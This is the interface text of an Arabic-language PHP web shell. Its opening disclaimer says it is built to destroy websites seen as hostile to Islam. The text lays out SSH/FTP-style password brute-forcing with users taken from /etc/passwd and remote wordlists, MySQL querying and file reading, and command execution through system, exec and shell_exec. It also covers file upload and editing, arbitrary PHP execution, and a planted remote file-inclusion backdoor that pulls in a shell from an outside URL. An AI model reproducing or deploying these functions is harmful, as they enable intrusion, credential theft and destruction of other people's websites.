Brute Force
نبرأ أمام الله من كل من يستخدم هذا السكربت في الضر بمواقع المسلمين وتم برمجته لتدمير المواقع التي تحارب الإسلام والمسلمين
اليوزرات :
root user1 user2
الباسوردات :
1 12 123 1234 12345 123456 1234567 12345678 123456789 1234567890
السيرفر :
نوع اليوزر او الباسورد :
الإفتراضي: سيتم التخمين على الباسوردات الموجودة في مربع الباسوردات بالأعلى
في مربع اليوزرات بالأعلى تم نسخها من ملف /etc/passwd
تخمين الباسوردات من ملف مرفوع على هذا السيرفر ..قم بوضع اسم ملف الباسوردات
تخمين الباسوردات من ملف مرفوع على موقع أخر..قم بوضع رابط الملف
روابط يمكن استخدامها
http://www.ethicalhack3r.co.uk/files/fuzzing/phpbb.txt
http://www.ethicalhack3r.co.uk/files/fuzzing/rockyou-75.txt
إدارة قواعد البيانات MYSQL
اليوزر
الباسورد
قاعدة البيانات
اوامر ~
SHOW DATABASES; SHOW TABLES user_vb ; SELECT * FROM user; SELECT version(); SELECT user();
قراءة الملفات عبر MYSQL
اليوزر
الباسورد
قاعدة البيانات
مسار الملف ~
إنشاء ملف جديد عبر MYSQL
اليوزر
الباسورد
قاعدة البيانات
كود الصفحة ~
<?php include($_GET['u'])?>
هذه الكود لعمل ثغره
file include
يمكنك استدعاء اي شل بهذه الطريقة
www.site.com/file.php?u=http://shell
مسار الملف ~
موجة الأوامر system - passthru - exec - shell_exec
اوامر ~
system
passthru
exec
shell_exec
إدارة الملفات والمجلدات
المسار ~
تحميل ملف
مسار الملف ~
تعديل ملف
مسار الملف ~
رفع ملف
File ~
Path ~
تفيذ أكواد PHP
الأكواد ~
echo '<center><b>PHP Working</b></center>'; #readfile('/etc/passwd');